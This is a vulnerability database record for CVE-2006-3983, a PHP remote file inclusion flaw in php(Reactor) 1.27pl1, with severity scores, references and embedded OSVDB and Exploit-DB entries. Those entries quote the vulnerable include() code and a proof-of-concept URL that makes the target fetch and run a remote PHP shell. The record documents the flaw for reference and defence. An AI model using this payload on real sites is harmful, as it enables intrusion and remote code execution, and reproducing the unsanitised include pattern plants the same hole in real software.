ID CVE-2006-3983
Type cve
Reporter cve@mitre.org
Modified 2017-10-19T01:29:00
Description
PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.
{"id": "CVE-2006-3983", "bulletinFamily": "NVD", "title": "CVE-2006-3983", "description": "PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter.", "published": "2006-08-05T00:04:00", "modified": "2017-10-19T01:29:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3983", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/2095", "https://exchange.xforce.ibmcloud.com/vulnerabilities/28100", "http://www.vupen.com/english/advisories/2006/3087", "http://www.securityfocus.com/bid/19259"], "cvelist": ["CVE-2006-3983"], "type": "cve", "lastseen": "2020-10-03T11:48:17", "edition": 3, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:30198"]}, {"type": "exploitdb", "idList": ["EDB-ID:2095"]}], "modified": "2020-10-03T11:48:17", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-10-03T11:48:17", "rev": 2}, "vulnersScore": 6.8}, "cpe": ["cpe:/a:ekilat_llc:php\\(reactor\\):1.27pl1"], "affectedSoftware": [{"cpeName": "ekilat_llc:php\\(reactor\\)", "name": "ekilat llc php\\(reactor\\)", "operator": "eq", "version": "1.27pl1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:ekilat_llc:php\\(reactor\\):1.27pl1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ekilat_llc:php\\(reactor\\):1.27pl1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-3983"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?\n## References:\nVendor URL: http://phpreactor.org/\nISS X-Force ID: 28100\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2095\nFrSIRT Advisory: ADV-2006-3087\n[CVE-2006-3983](https://vulners.com/cve/CVE-2006-3983)\nBugtraq ID: 19259\n", "edition": 1, "modified": "2006-07-31T14:20:36", "published": "2006-07-31T14:20:36", "href": "https://vulners.com/osvdb/OSVDB:30198", "id": "OSVDB:30198", "title": "php(Reactor) editprofile.php pathtohomedir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:30:56", "description": "PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability. CVE-2006-3983. Webapps exploit for php platform", "published": "2006-07-31T00:00:00", "type": "exploitdb", "title": "PhpReactor 1.2.7pl1 pathtohomedir Remote Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3983"], "modified": "2006-07-31T00:00:00", "id": "EDB-ID:2095", "href": "https://www.exploit-db.com/exploits/2095/", "sourceData": "########################### www.system-defacers.org ###############\n# Found By CeNGiZ-HaN cengiz-han@system-defacers.org\n# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability\n############################################################################\n# Vulnerable Code in editprofile.php\n# //INCLUDE DB FUNCTIONS\n# if(!defined(\"REACTOR_INC_DB\")) { include($pathtohomedir.\"/inc/db.inc.php\"); }\n# //INCLUDE LANGUAGE FUNCTIONS\n# if(!defined(\"REACTOR_INC_LANG\")) { include($pathtohomedir.\"/inc/lang.inc.php\"); }\n# //INCLUDE USERS FUNCTIONS\n# if(!defined(\"REACTOR_INC_USERS\")) { include($pathtohomedir.\"/inc/users.inc.php\"); }\n# //INCLUDE BBS FUNCTIONS\n# if(!defined(\"REACTOR_INC_BBS\")) { include($pathtohomedir.\"/inc/bbs.inc.php\"); }\n#\n#\n# http://[target]/[path]/editprofile.php?pathtohomedir=http://phpshell.txt?\n#\n##############################################################################\n#\n# W W W . S Y S T E M - D E F A C E R S . O R G\n#\n##############################################################################\n\n# milw0rm.com [2006-07-31]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2095/"}]}